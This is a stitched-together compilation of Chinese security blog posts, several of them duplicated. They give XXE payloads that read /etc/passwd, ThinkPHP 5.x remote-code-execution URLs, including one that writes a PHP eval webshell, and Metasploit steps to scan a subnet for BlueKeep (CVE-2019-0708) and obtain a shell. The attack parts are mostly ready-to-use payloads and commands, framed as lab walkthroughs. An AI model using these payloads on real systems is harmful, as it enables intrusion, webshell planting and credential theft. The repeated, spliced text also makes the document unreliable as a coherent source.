XML 被设计用来传输和存储数据。 语法规则<?xml version="1.0" encoding="UTF-8"?> <!--XML 声明--> <girl age="18">　　<!--自定的根元素girl;age属性需要加引导--> <hair>长头发</hair>　　<!--自定义的4个子元素，即girl对象的属性--> <eye>大眼睛</eye> <face>可爱的脸庞</face> <summary>可爱美丽的女孩</summary> </girl>　　<!--根元素的闭合-->Payload获取账户密码： <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note[ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <xxe>&xxe;</xxe> 读取网站任意文件：<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note[ <!ENTITY xxe SYSTEM "http://127.0.0.1/bWAPP/robots.txt"> ]> <reset><login>&xxe;</login><secret>Any bugs?</secret></reset> 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/610.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

前言ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本，推荐尽快更新到最新版本。 漏洞分析Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815 关键代码：// 获取控制器名 $controller = strip_tags($result[1] ?: $this->rule->getConfig('default_controller'));在修复之前程序未对控制器进行过滤，导致攻击者可以通过引入\符号来调用任意类方法。 漏洞利用执行系统命令显示目录下文件http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l 执行phpinfohttp://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();' 写info.php文件http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20phpinfo();?>%27%20>%20info.php访问 info.php 同理，我们可以利用此方法写入PHP一句话木马。 index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php @eval($_POST['c']);?>%27%20>%20inf.php然后我们用菜刀连接即可。 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/576.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

XML 被设计用来传输和存储数据。 语法规则<?xml version="1.0" encoding="UTF-8"?> <!--XML 声明--> <girl age="18">　　<!--自定的根元素girl;age属性需要加引导--> <hair>长头发</hair>　　<!--自定义的4个子元素，即girl对象的属性--> <eye>大眼睛</eye> <face>可爱的脸庞</face> <summary>可爱美丽的女孩</summary> </girl>　　<!--根元素的闭合-->Payload获取账户密码： <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note[ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <xxe>&xxe;</xxe> 读取网站任意文件：<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note[ <!ENTITY xxe SYSTEM "http://127.0.0.1/bWAPP/robots.txt"> ]> <reset><login>&xxe;</login><secret>Any bugs?</secret></reset> 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/610.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

漏洞介绍2019年5月14日微软官方发布安全补丁，修复了Windows远程桌面服务的远程代码执行漏洞，该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互，这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机，其方式与2017年WannaCry恶意软件的传播方式类似。 从微软官方的消息一出，各大安全厂商都开始发布了漏洞预警，那段时间我也一直在找对应的POC，但要不就是不能利用的POC，要不就是利用以前漏洞写的POC，更有甚着点击attack后给你惊喜。 靶场环境漏洞环境,我当时就是虚拟机装了Windows7 SP1的系统， 001使用VM安装Windows7 SP1模拟受害机 Windows7 SP1下载链接(这里的靶机是使用清水表哥提供的win7sp1的系统):迅雷下载ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/ 云盘下载：Windows7 X64下载链接：链接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx 002 msf配置 下载cve_2019_0708_bluekeep_rce.rb到msf的配置文件/usr/share/metasploit-framework/modules/exploits/windows/rdp 扫描存在漏洞的主机msfconsole search 0708 #扫描可用模块 use auxiliary/scanner/rdp/cve_2019_0708_bluekeep #加载扫描模块 set RHOSTS 192.168.1.1/24 #设置扫描地址池 run 如图，可以扫描到当前网段有设备192.168.1.8存在该漏洞。 漏洞利用利用msf攻击在利用msf攻击时，需要注意配置RHOSTS和target这两个参数 msfconsole use exploit/windows/rdp/cve_2019_0708_bluekeep_rce set RHOSTS 192.168.1.8 set target 2 （当前靶机为虚拟机安装的win7） run成功得到shell target参数 Exploit target: Id Name -- ---- 1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64) 2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox) 3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare) 4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V) 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/1378.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

漏洞介绍2019年5月14日微软官方发布安全补丁，修复了Windows远程桌面服务的远程代码执行漏洞，该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互，这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机，其方式与2017年WannaCry恶意软件的传播方式类似。 从微软官方的消息一出，各大安全厂商都开始发布了漏洞预警，那段时间我也一直在找对应的POC，但要不就是不能利用的POC，要不就是利用以前漏洞写的POC，更有甚着点击attack后给你惊喜。 靶场环境漏洞环境,我当时就是虚拟机装了Windows7 SP1的系统， 001使用VM安装Windows7 SP1模拟受害机 Windows7 SP1下载链接(这里的靶机是使用清水表哥提供的win7sp1的系统):迅雷下载ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/ 云盘下载：Windows7 X64下载链接：链接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx 002 msf配置 下载cve_2019_0708_bluekeep_rce.rb到msf的配置文件/usr/share/metasploit-framework/modules/exploits/windows/rdp 扫描存在漏洞的主机msfconsole search 0708 #扫描可用模块 use auxiliary/scanner/rdp/cve_2019_0708_bluekeep #加载扫描模块 set RHOSTS 192.168.1.1/24 #设置扫描地址池 run 如图，可以扫描到当前网段有设备192.168.1.8存在该漏洞。 漏洞利用利用msf攻击在利用msf攻击时，需要注意配置RHOSTS和target这两个参数 msfconsole use exploit/windows/rdp/cve_2019_0708_bluekeep_rce set RHOSTS 192.168.1.8 set target 2 （当前靶机为虚拟机安装的win7） run成功得到shell target参数 Exploit target: Id Name -- ---- 1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64) 2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox) 3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare) 4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V) 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/1378.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。